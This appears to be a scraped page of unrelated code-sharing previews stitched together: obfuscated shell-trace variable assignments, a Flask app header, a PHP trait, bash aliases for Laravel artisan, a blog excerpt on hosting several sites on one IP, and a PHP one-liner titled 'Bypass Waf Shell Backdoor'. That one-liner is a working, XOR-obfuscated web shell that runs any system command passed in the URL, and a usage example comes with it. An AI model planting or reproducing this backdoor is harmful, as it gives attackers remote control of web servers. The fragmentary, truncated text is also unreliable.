+ z='
'
+ cABz='='\''MD'
+ qWBz=';hFz'
+ CXBz=''\''FDz'
+ gQz='z'\'';r'
+ qCz=''\''OIz'
+ svz=';coz'
+ JRBz=''\'';iP'
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import mimetypes | |
from flask import Flask, render_template, request, Response, send_file, stream_with_context | |
from random import randint | |
import time | |
# Flask constructor takes the name of | |
# current module (__name__) as argument. | |
app = Flask(__name__, template_folder='template') | |
approvals = [] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
test |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Bypass Waf Shell Backdoor --> | |
<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]); | |
// shell.php?_=system&__=id |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* @author Nando (c) 2018 | |
* Simple API Trait | |
*/ | |
namespace App\Traits; | |
trait APITrait | |
{ |
When hosting our web applications, we often have one public IP
address (i.e., an IP address visible to the outside world)
using which we want to host multiple web apps. For example, one
may wants to host three different web apps respectively for
example1.com
, example2.com
, and example1.com/images
on
the same machine using a single IP address.
How can we do that? Well, the good news is Internet browsers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#aliases php artisan | |
mm(){ | |
php artisan make:model Models/"$1" | |
} | |
mmi(){ | |
php artisan make:model -m Models/"$1" | |
} | |
mc(){ |